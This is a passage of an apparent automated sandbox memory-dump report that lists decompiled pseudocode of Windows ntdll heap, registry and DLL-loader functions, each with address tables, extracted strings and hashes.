							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E00AAA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E00A7B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x00a87e4c
0x00a87e50
0x00a87e55
0x00a87e58
0x00a87e5d
0x00a87e71
0x00a87f33
0x00a87e77
0x00a87e77
0x00a87e79
0x00a87e79
0x00a87e7e
0x00a87f45
0x00ad9848
0x00000000
0x00ad9848
0x00a87f4e
0x00a87f53
0x00a87f5a
0x00000000
0x00000000
0x00ad985a
0x00ad9862
0x00ad9866
0x00000000
0x00ad986c
0x00000000
0x00ad986c
0x00a87e84
0x00a87e84
0x00a87e8d
0x00ad9871
0x00a87eb8
0x00a87ec0
0x00a87ec0
0x00a87e9a
0x00ad987e
0x00000000
0x00000000
0x00ad9884
0x00ad988b
0x00ad98a7
0x00ad98ac
0x00ad98b1
0x00ad98b6
0x00ad98b8
0x00ad98b8
0x00ad98b9
0x00000000
0x00ad98b9
0x00a87ea0
0x00a87ea7
0x00000000
0x00000000
0x00a87eac
0x00a87eb1
0x00a87ec6
0x00a87ed0
0x00ad98cc
0x00a87ed6
0x00a87ed6
0x00a87ed6
0x00a87ede
0x00a87ee3
0x00ad98e3
0x00ad98f0
0x00ad9902
0x00ad98f2
0x00ad98fb
0x00ad98fb
0x00ad9907
0x00ad991d
0x00ad991d
0x00ad9907
0x00ad98e3
0x00a87ef0
0x00a87f14
0x00a87f14
0x00a87f1e
0x00ad9946
0x00a87f24
0x00a87f24
0x00a87f24
0x00a87f2c
0x00ad996a
0x00ad9975
0x00ad9975
0x00ad997e
0x00ad9993
0x00ad9993
0x00ad997e
0x00000000
0x00a87ef2
0x00a87efc
0x00a87f0a
0x00a87f0e
0x00ad9933
0x00000000
0x00ad9933
0x00000000
0x00a87f0e
0x00000000
0x00000000
0x00000000
0x00a87eb1

Strings

Could not validate the crypto signature for DLL %wZ, xrefs: 00AD9891
LdrpCompleteMapModule, xrefs: 00AD9898
minkernel\ntdll\ldrmap.c, xrefs: 00AD98A2

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 0f4534982a0d98147f375b4552906882cfbfdd154152f6f73d07f81ba4c6c9a9
Instruction ID: 00d5ffbcb48fb232dea9379ae3aa540fdc6ceaa5b20663fc41b89369c0bd47ae
Opcode Fuzzy Hash: 0f4534982a0d98147f375b4552906882cfbfdd154152f6f73d07f81ba4c6c9a9
Instruction Fuzzy Hash: 2A51F3316087449BDB22EB68C984B2E7BE4BF01714F2406AAF9529B7E1D774ED00CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B223E3, Relevance: 3.9, Strings: 3, Instructions: 166
COMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E00B223E3(signed int __ecx, unsigned int __edx) {
				intOrPtr _v8;
				intOrPtr _t42;
				char _t43;
				signed short _t44;
				signed short _t48;
				signed char _t51;
				signed short _t52;
				intOrPtr _t54;
				signed short _t64;
				signed short _t66;
				intOrPtr _t69;
				signed short _t73;
				signed short _t76;
				signed short _t77;
				signed short _t79;
				void* _t83;
				signed int _t84;
				signed int _t85;
				signed char _t94;
				unsigned int _t99;
				unsigned int _t104;
				signed int _t108;
				void* _t110;
				void* _t111;
				unsigned int _t114;

				_t84 = __ecx;
				_push(__ecx);
				_t114 = __edx;
				_t42 =  *((intOrPtr*)(__edx + 7));
				if(_t42 == 1) {
					L49:
					_t43 = 1;
					L50:
					return _t43;
				}
				if(_t42 != 4) {
					if(_t42 >= 0) {
						if( *(__ecx + 0x4c) == 0) {
							_t44 =  *__edx & 0x0000ffff;
						} else {
							_t73 =  *__edx;
							if(( *(__ecx + 0x4c) & _t73) != 0) {
								_t73 = _t73 ^  *(__ecx + 0x50);
							}
							_t44 = _t73 & 0x0000ffff;
						}
					} else {
						_t104 = __edx >> 0x00000003 ^  *__edx ^  *0xb6874c ^ __ecx;
						if(_t104 == 0) {
							_t76 =  *((intOrPtr*)(__edx - (_t104 >> 0xd)));
						} else {
							_t76 = 0;
						}
						_t44 =  *((intOrPtr*)(_t76 + 0x14));
					}
					_t94 =  *((intOrPtr*)(_t114 + 7));
					_t108 = _t44 & 0xffff;
					if(_t94 != 5) {
						if((_t94 & 0x00000040) == 0) {
							if((_t94 & 0x0000003f) == 0x3f) {
								if(_t94 >= 0) {
									if( *(_t84 + 0x4c) == 0) {
										_t48 =  *_t114 & 0x0000ffff;
									} else {
										_t66 =  *_t114;
										if(( *(_t84 + 0x4c) & _t66) != 0) {
											_t66 = _t66 ^  *(_t84 + 0x50);
										}
										_t48 = _t66 & 0x0000ffff;
									}
								} else {
									_t99 = _t114 >> 0x00000003 ^  *_t114 ^  *0xb6874c ^ _t84;
									if(_t99 == 0) {
										_t69 =  *((intOrPtr*)(_t114 - (_t99 >> 0xd)));
									} else {
										_t69 = 0;
									}
									_t48 =  *((intOrPtr*)(_t69 + 0x14));
								}
								_t85 =  *(_t114 + (_t48 & 0xffff) * 8 - 4);
							} else {
								_t85 = _t94 & 0x3f;
							}
						} else {
							_t85 =  *(_t114 + 4 + (_t94 & 0x3f) * 8) & 0x0000ffff;
						}
					} else {
						_t85 =  *(_t84 + 0x54) & 0x0000ffff ^  *(_t114 + 4) & 0x0000ffff;
					}
					_t110 = (_t108 << 3) - _t85;
				} else {
					if( *(__ecx + 0x4c) == 0) {
						_t77 =  *__edx & 0x0000ffff;
					} else {
						_t79 =  *__edx;
						if(( *(__ecx + 0x4c) & _t79) != 0) {
							_t79 = _t79 ^  *(__ecx + 0x50);
						}
						_t77 = _t79 & 0x0000ffff;
					}
					_t110 =  *((intOrPtr*)(_t114 - 8)) - (_t77 & 0x0000ffff);
				}
				_t51 =  *((intOrPtr*)(_t114 + 7));
				if(_t51 != 5) {
					if((_t51 & 0x00000040) == 0) {
						_t52 = 0;
						goto L42;
					}
					_t64 = _t51 & 0x3f;
					goto L38;
				} else {
					_t64 =  *(_t114 + 6) & 0x000000ff;
					L38:
					_t52 = _t64 << 0x00000003 & 0x0000ffff;
					L42:
					_t35 = _t114 + 8; // -16
					_t111 = _t110 + (_t52 & 0x0000ffff);
					_t83 = _t35 + _t111;
					_t54 = E00ACD4F0(_t83, 0xa56c58, 8);
					_v8 = _t54;
					if(_t54 == 8) {
						goto L49;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E00A7B150();
					} else {
						E00A7B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t111);
					_push(_v8 + _t83);
					E00A7B150("Heap block at %p modified at %p past requested size of %Ix\n", _t114);
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0xb66378 = 1;
						asm("int3");
						 *0xb66378 = 0;
					}
					_t43 = 0;
					goto L50;
				}
			}

0x00b223e3
0x00b223e8
0x00b223eb
0x00b223ee
0x00b223f3
0x00b2259b
0x00b2259b
0x00b2259d
0x00b225a3
0x00b225a3
0x00b223fb
0x00b22424
0x00b2244f
0x00b22460
0x00b22451
0x00b22451
0x00b22456
0x00b22458
0x00b22458
0x00b2245b
0x00b2245b
0x00b22426
0x00b22431
0x00b22436
0x00b22443
0x00b22438
0x00b22438
0x00b22438
0x00b22445
0x00b22445
0x00b22463
0x00b22469
0x00b2246f
0x00b22480
0x00b22495
0x00b224a1
0x00b224ce
0x00b224df
0x00b224d0
0x00b224d0
0x00b224d5
0x00b224d7
0x00b224d7
0x00b224da
0x00b224da
0x00b224a3
0x00b224b0
0x00b224b5
0x00b224c2
0x00b224b7
0x00b224b7
0x00b224b7
0x00b224c4
0x00b224c4
0x00b224e8
0x00b22497
0x00b2249a
0x00b2249a
0x00b22482
0x00b22488
0x00b22488
0x00b22471
0x00b22479
0x00b22479
0x00b224ef
0x00b223fd
0x00b22401
0x00b22412
0x00b22403
0x00b22403
0x00b22408
0x00b2240a
0x00b2240a
0x00b2240d
0x00b2240d
0x00b2241b
0x00b2241b
0x00b224f1
0x00b224f6
0x00b22507
0x00b22510
0x00000000
0x00b22510
0x00b2250b
0x00000000
0x00b224f8
0x00b224f8
0x00b224fc
0x00b22500
0x00b22512
0x00b22515
0x00b2251a
0x00b22521
0x00b22524
0x00b22529
0x00b2252f
0x00000000
0x00000000
0x00b2253c
0x00b2255c
0x00b22561
0x00b2253e
0x00b22554
0x00b22559
0x00b2256a
0x00b2256d
0x00b22574
0x00b22586
0x00b22588
0x00b2258f
0x00b22590
0x00b22590
0x00b22597
0x00000000
0x00b22597

Strings

HEAP: , xrefs: 00B2255C
HEAP[%wZ]: , xrefs: 00B2254F
Heap block at %p modified at %p past requested size of %Ix, xrefs: 00B2256F

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
API String ID: 0-3815128232
Opcode ID: 1171a11c15cd5d8fa94c62dc99634cd8c8e8646aba1d5d0f4e52a553414d9e1b
Instruction ID: 802677663efd78effbdd48d8a8c60f198e8e790626d9d5537e6c0924d7a55cf4
Opcode Fuzzy Hash: 1171a11c15cd5d8fa94c62dc99634cd8c8e8646aba1d5d0f4e52a553414d9e1b
Instruction Fuzzy Hash: 99515534100270AAE334EF19E89577273E1EF58345F6488D9E9EACB381D679D847EB20

Uniqueness

Uniqueness Score: -1.00%

Function 00A7E620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00A7E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E00A7F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E00AB95D0();
						}
						if(_t78 != 0) {
							L00A977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E00ABFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E00ABBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E00AB9600();
					if(_t97 < 0) {
						goto L6;
					}
					E00ABBB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L00A7F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E00ABBB40(_t83, _t102 + 0x24, _t78);
								if(L00A843C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E00ABBB40(_t84, _t102 + 0x24, _t94);
									if(L00A843C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x00a7e620
0x00a7e628
0x00a7e62f
0x00a7e631
0x00a7e635
0x00a7e637
0x00a7e63e
0x00ad5503
0x00ad5503
0x00a7e64c
0x00a7e64c
0x00a7e651
0x00000000
0x00000000
0x00a7e661
0x00a7e665
0x00ad542a
0x00a7e715
0x00a7e71a
0x00a7e71c
0x00a7e720
0x00a7e720
0x00a7e727
0x00a7e736
0x00a7e736
0x00a7e743
0x00a7e743
0x00a7e673
0x00a7e678
0x00a7e67d
0x00a7e682
0x00a7e685
0x00a7e692
0x00a7e69b
0x00a7e6a3
0x00a7e6ad
0x00a7e6b1
0x00a7e6b2
0x00a7e6bb
0x00a7e6bf
0x00a7e6c0
0x00a7e6c8
0x00a7e6cc
0x00a7e6d5
0x00a7e6d9
0x00000000
0x00000000
0x00a7e6e5
0x00a7e6ea
0x00a7e6f9
0x00a7e70b
0x00a7e70f
0x00ad5439
0x00ad545e
0x00ad545e
0x00000000
0x00ad545e
0x00ad543b
0x00ad543e
0x00ad5440
0x00ad5445
0x00ad5472
0x00ad5475
0x00ad548d
0x00ad5493
0x00ad54a9
0x00000000
0x00000000
0x00ad54ab
0x00ad54b4
0x00ad54bc
0x00ad54c8
0x00ad54de
0x00ad54fb
0x00ad54e0
0x00ad54e6
0x00ad54eb
0x00ad54eb
0x00ad54de
0x00000000
0x00ad54bc
0x00ad5477
0x00ad547a
0x00ad5480
0x00ad5483
0x00ad5486
0x00ad548b
0x00000000
0x00000000
0x00000000
0x00ad548b
0x00000000
0x00000000
0x00000000
0x00000000
0x00ad5447
0x00ad5447
0x00ad5447
0x00ad5447
0x00ad544e
0x00000000
0x00000000
0x00ad5450
0x00ad5452
0x00ad5455
0x00ad545a
0x00000000
0x00000000
0x00000000
0x00ad545c
0x00ad546a
0x00ad546d
0x00ad546f
0x00000000
0x00ad546f
0x00a7e70f

Strings

@, xrefs: 00A7E6C0
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00A7E68C
InstallLanguageFallback, xrefs: 00A7E6DB

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: 1d45e5cb1e741ae8601cd79e28496ad7122ff1d154ffaada753e44f3e56de8cb
Instruction ID: 2e56f0a84523c2f9ad559df637446488dcd2bfffc92de2f86c3d6482b7f4196e
Opcode Fuzzy Hash: 1d45e5cb1e741ae8601cd79e28496ad7122ff1d154ffaada753e44f3e56de8cb
Instruction Fuzzy Hash: 1E51AFB29083459BC714DF68C840AABB3E9BF88714F44496EF98AD7241F734DD4487A2

Uniqueness

Uniqueness Score: -1.00%

Function 00A9B8E4, Relevance: 3.8, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00A9B8E4(unsigned int __edx) {
				void* __ecx;
				void* __edi;
				intOrPtr* _t16;
				intOrPtr _t18;
				void* _t27;
				void* _t28;
				unsigned int _t30;
				intOrPtr* _t31;
				unsigned int _t38;
				void* _t39;
				unsigned int _t40;

				_t40 = __edx;
				_t39 = _t28;
				if( *0xb68748 >= 1) {
					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
						_t18 =  *[fs:0x30];
						__eflags =  *(_t18 + 0xc);
						if( *(_t18 + 0xc) == 0) {
							_push("HEAP: ");
							E00A7B150();
						} else {
							E00A7B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
						E00A7B150();
						__eflags =  *0xb67bc8;
						if(__eflags == 0) {
							E00B32073(_t27, 1, _t39, __eflags);
						}
					}
				}
				_t38 =  *(_t39 + 0xb8);
				if(_t38 != 0) {
					_t13 = _t40 >> 0xc;
					__eflags = _t13;
					while(1) {
						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
							break;
						}
						_t30 =  *_t38;
						__eflags = _t30;
						if(_t30 != 0) {
							_t38 = _t30;
							continue;
						}
						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
						break;
					}
					return E00A9AB40(_t39, _t38, 0, _t13, _t40);
				} else {
					_t31 = _t39 + 0x8c;
					_t16 =  *_t31;
					while(_t31 != _t16) {
						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
							return _t16;
						}
						_t16 =  *_t16;
					}
					return _t31;
				}
			}

0x00a9b8f0
0x00a9b8f2
0x00a9b8f4
0x00ae2c4e
0x00ae2c50
0x00ae2c56
0x00ae2c5c
0x00ae2c60
0x00ae2c7f
0x00ae2c84
0x00ae2c62
0x00ae2c77
0x00ae2c7c
0x00ae2c8a
0x00ae2c8f
0x00ae2c94
0x00ae2c9c
0x00ae2ca5
0x00ae2ca5
0x00ae2c9c
0x00ae2c50
0x00a9b8fa
0x00a9b902
0x00a9b921
0x00a9b921
0x00a9b924
0x00a9b924
0x00a9b927
0x00000000
0x00000000
0x00a9b929
0x00a9b92b
0x00a9b92d
0x00a9b940
0x00000000
0x00a9b940
0x00a9b932
0x00a9b932
0x00000000
0x00a9b932
0x00000000
0x00a9b904
0x00a9b904
0x00a9b90a
0x00a9b90c
0x00a9b916
0x00a9b919
0x00a9b915
0x00a9b915
0x00a9b91b
0x00a9b91b
0x00000000
0x00a9b910

Strings

HEAP: , xrefs: 00AE2C7F
HEAP[%wZ]: , xrefs: 00AE2C72
(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 00AE2C8A

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: f8bf79b99529633ad8c7f5a413c5c8d17518ca1c5f60a1cc8963a509a9b92ec7
Instruction ID: e6761c5a7b448e3b808364975c7d3c480b222c32140e3d7762405025a389592f
Opcode Fuzzy Hash: f8bf79b99529633ad8c7f5a413c5c8d17518ca1c5f60a1cc8963a509a9b92ec7
Instruction Fuzzy Hash: 2A11AF313351019BDB18D725EA95B39B3F5FF80720F248169E50ACB291EB70D844D6A1

Uniqueness

Uniqueness Score: -1.00%

Function 00A8D5E0, Relevance: 2.9, Strings: 2, Instructions: 353
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E00A8D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0xb6d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E00A86600(0xb652d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0xb67b9c; // 0x0
							_t281 = L00A94620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E00ABF3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0xb67b90; // 0x779c0000
								if(_t384 == 0) {
									_t353 =  *0xb67b8c; // 0x7b2a38
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E00A92280(_t200, 0xb684d8);
									_t277 =  *0xb685f4; // 0x7b2f28
									_t351 =  *0xb685f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x7b2ec0
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E00A8FFB0(_t287, _t353, 0xb684d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E00ACCC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E00A86600(0xb652d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E00A87926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0xb6b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E00AFE974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0xb68472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														asm("ror edi, cl");
														 *0xb6b1e0( &_v192, _t353, _v168, 0, _v180);
														 *( *0xb6b218 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E00A92280(_t250, 0xb684d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L00AB3898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E00A8FFB0(_t293, _t353, 0xb684d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E00AB37F5(_t353, 0);
																}
																E00AB0413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E00AA9B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E00AA02D6(_t174);
																}
																L00A977F0( *0xb67b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E00AAC277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L00A8EC7F(_t353);
										L00AA19B8(_t287, 0, _t353, 0);
										_t200 = E00A7F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L00A977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0 || ( *0xb6b2f8 |  *0xb6b2fc) == 0 || ( *0xb6b2e4 & 0x00000001) != 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E00ABB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_v200 = 0;
									if(( *0xb6b2ec >> 0x00000008 & 0x00000003) == 3) {
										_t355 = _v168;
										_t342 =  &_v208;
										_t208 = E00B26B68(_v168,  &_v208, _v168, __eflags);
										__eflags = _t208 - 1;
